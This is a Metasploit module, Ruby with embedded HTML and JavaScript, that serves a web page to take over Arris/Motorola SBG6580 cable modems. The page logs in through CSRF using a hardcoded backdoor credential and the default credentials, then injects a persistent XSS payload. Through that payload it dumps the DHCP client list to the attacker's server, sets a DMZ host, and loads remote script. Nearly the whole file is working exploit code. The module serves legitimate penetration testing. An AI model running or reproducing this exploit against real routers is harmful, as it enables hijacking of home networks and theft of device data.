##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Arris / Motorola Surfboard SBG6580 Web Interface Takeover',
        'Description' => %q{
          The web interface for the Arris / Motorola Surfboard SBG6580 has
          several vulnerabilities that, when combined, allow an arbitrary website to take
          control of the modem, even if the user is not currently logged in. The attacker
          must successfully know, or guess, the target's internal gateway IP address.
          This is usually a default value of 192.168.0.1.

          First, a hardcoded backdoor account was discovered in the source code
          of one device with the credentials "technician/yZgO8Bvj". Due to lack of CSRF
          in the device's login form, these credentials - along with the default
          "admin/motorola" - can be sent to the device by an arbitrary website, thus
          inadvertently logging the user into the router.

          Once successfully logged in, a persistent XSS vulnerability is
          exploited in the firewall configuration page. This allows injection of
          Javascript that can perform any available action in the router interface.

          The following firmware versions have been tested as vulnerable:

          SBG6580-6.5.2.0-GA-06-077-NOSH, and
          SBG6580-8.6.1.0-GA-04-098-NOSH
        },
        'Author' => [ 'joev' ],
        'DisclosureDate' => '2015-04-08',
        'License' => MSF_LICENSE,
        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction' => 'WebServer',
        'References' => [
          [ 'CVE', '2015-0964' ], # XSS vulnerability
          [ 'CVE', '2015-0965' ], # CSRF vulnerability
          [ 'CVE', '2015-0966' ], # "technician/yZgO8Bvj" web interface backdoor
          [ 'URL', 'https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/' ],
        ]
      )
    )

    register_options([
      OptString.new('DEVICE_IP', [
        false,
        'Internal IP address of the vulnerable device.',
        '192.168.0.1'
      ]),
      OptString.new('LOGINS', [
        false,
        'Comma-separated list of user/pass combinations to attempt.',
        'technician/yZgO8Bvj,admin/motorola'
      ]),
      OptBool.new('DUMP_DHCP_LIST', [
        true,
        'Dump the MAC, IP, and hostnames of all registered DHCP clients.',
        true
      ]),
      OptInt.new('SET_DMZ_HOST', [
        false,
        'The final octet of the IP address to set in the DMZ (1-255).',
        nil
      ]),
      OptString.new('BLOCK_INTERNET_ACCESS', [
        false,
        'Comma-separated list of IP addresses to block internet access for.',
        ''
      ]),
      OptString.new('CUSTOM_JS', [
        false,
        'A string of javascript to execute in the context of the device web interface.',
        ''
      ]),
      OptString.new('REMOTE_JS', [
        false,
        'A URL to inject into a script tag in the context of the device web interface.',
        ''
      ])
    ])
  end

  def run
    if datastore['SET_DMZ_HOST']
      dmz_host = datastore['SET_DMZ_HOST'].to_i
      if dmz_host < 1 || dmz_host > 255
        raise ArgumentError, 'DMZ host must be an integer between 1 and 255.'
      end
    end

    exploit
  end

  def on_request_uri(cli, request)
    if request.method =~ /post/i
      file = store_loot(
        'dhcp.clients', 'text/json', cli.peerhost,
        request.body, 'arris_surfboard_xss', 'DHCP client list gathered from modem'
      )
      print_good "Dumped DHCP client list from #{cli.peerhost}"
      print_good file
    elsif request.uri =~ %r{/dmz$}i
      print_good "DMZ host successfully reset to #{datastore['SET_DMZ_HOST']}."
      send_response_html(cli, '')
    else
      send_response_html(cli, exploit_html)
    end
  end

  def set_dmz_host_js
    return '' unless datastore['SET_DMZ_HOST'].present?

    %|
      var x = new XMLHttpRequest;
      x.open('POST', '/goform/RgDmzHost.pl');
      x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
      x.send('DmzHostIP3=#{datastore['SET_DMZ_HOST']}');
      top.postMessage(JSON.stringify({type:'dmz',done:true}), '*');
    |
  end

  def dump_dhcp_list_js
    return '' unless datastore['DUMP_DHCP_LIST']

    %|
      var f = document.createElement('iframe');
      f.src = '/RgDhcp.asp';
      f.onload = function() {
        var mac = f.contentDocument.querySelector('input[name="dhcpmacaddr1"]');
        var rows = [];
        if (mac) {
          var tr = mac.parentNode.parentNode;
          while (tr) {
            if (tr.tagName === 'TR' && !tr.querySelector('input[type="Submit"]')) {
              var tds = [].slice.call(tr.children);
              var row = [];
              rows.push(row);
              for (var i in tds) {
                row.push(tds[i].innerText);
              }
            }
            tr = tr.nextSibling;
          }
        }
        if (rows.length > 0) {
          top.postMessage(JSON.stringify({type:'dhcp',rows:rows}), '*');
          document.body.removeChild(f);
        }
      };
      document.body.appendChild(f);
    |
  end

  def exploit_js
    [
      dump_dhcp_list_js,
      set_dmz_host_js,
      custom_js
    ].join("\n")
  end

  def exploit_html
    <<~EOS
      <!doctype html>
      <html>
      <body>

      <script>

      window.onmessage = function(e) {
        var data = JSON.parse(e.data);
        if (data.type == 'dhcp') {
          var rows = JSON.stringify(data.rows);
          var xhr = new XMLHttpRequest();
          xhr.open('POST', '#{get_uri}/collect');
          xhr.send(rows);
        } else if (data.type == 'dmz') {
          var xhr = new XMLHttpRequest();
          xhr.open('GET', '#{get_uri}/dmz');
          xhr.send();
        }
      }

      var js = (#{JSON.generate({ js: exploit_js })}).js;

      var HIDDEN_STYLE =
        'position:absolute;left:-9999px;top:-9999px;';

      function exploit(hosts, logins) {
        for (var idx in hosts) {
          buildImage(hosts[idx]);
        }

        function buildImage(host) {
          var img = new Image();
          img.src = host + '/images/px1_Ux.png';
          img.setAttribute('style', HIDDEN_STYLE);
          img.onload = function() {
            if (img.width === 1 && img.height === 1) {
              deviceFound(host, img);
            }
            img.parentNode.removeChild(img);
          };
          img.onerror = function() {
            img.src = host + '/logo_new.gif';
            img.onload = function() {
              if (img.width === 176 && img.height === 125) {
                deviceFound(host, img);
              }
            }
            img.onerror = function() {
              img.parentNode.removeChild(img);
            };
          };
          document.body.appendChild(img);
        }

        function deviceFound(host, img) {
          // but also lets attempt to log the user in with every login
          var count = 0;
          for (var idx in logins) {
            attemptLogin(host, logins[idx], function() {
              if (++count >= logins.length) {
                attemptExploit(host);
              }
            })
          }
        }

        function attemptExploit(host) {
          var form = document.createElement('form');
          form.setAttribute('style', HIDDEN_STYLE);
          form.setAttribute('method', 'POST');
          form.setAttribute('action', host+'/goform/RgFirewallEL')
          document.body.appendChild(form);

          var inputs = [];
          var inputNames = [
            'EmailAddress', 'SmtpServerName', 'SmtpUsername',
            'SmtpPassword', 'LogAction'
          ];

          var input;
          for (var idx in inputNames) {
            input = document.createElement('input');
            input.setAttribute('type', 'hidden');
            input.setAttribute('name', inputNames[idx]);
            form.appendChild(input);
            inputs.push(input)
          }
          inputs[0].setAttribute('value', '<script>@a.com<script>eval(window.name);<\\/script>');
          inputs[inputs.length-1].setAttribute('value', '0');

          var iframe = document.createElement('iframe');
          iframe.setAttribute('style', HIDDEN_STYLE);

          window.id = window.id || 1;
          var name = '/*abc'+(window.id++)+'*/ '+js;
          iframe.setAttribute('name', name);
          document.body.appendChild(iframe);

          form.setAttribute('target', name);
          form.submit();

          setTimeout(function() {
            iframe.removeAttribute('sandbox');
            iframe.src = host+'/RgFirewallEL.asp';
          }, 1000);
        }

        function attemptLogin(host, login, cb) {
          try {
            var xhr = new XMLHttpRequest();
            xhr.open('POST', host+'/goform/login');
            xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            xhr.send('loginUsername='+encodeURIComponent(login[0])+
                     '&loginPassword='+encodeURIComponent(login[1]));
            xhr.onerror = function() {
              cb && cb();
              cb = null;
            }
          } catch(e) {};
        }
      }

      var logins = (#{JSON.generate({ logins: datastore['LOGINS'] })}).logins;
      var combos = logins.split(',');
      var splits = [], s = '';
      for (var i in combos) {
        s = combos[i].split('/');
        splits.push([s[0], s[1]]);
      }

      exploit(['http://#{datastore['DEVICE_IP']}'], splits);

      </script>

      </body>
      </html>
    EOS
  end

  def custom_js
    rjs_hook + datastore['CUSTOM_JS']
  end

  def rjs_hook
    remote_js = datastore['REMOTE_JS']
    if remote_js.present?
      "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
    else
      ''
    end
  end
end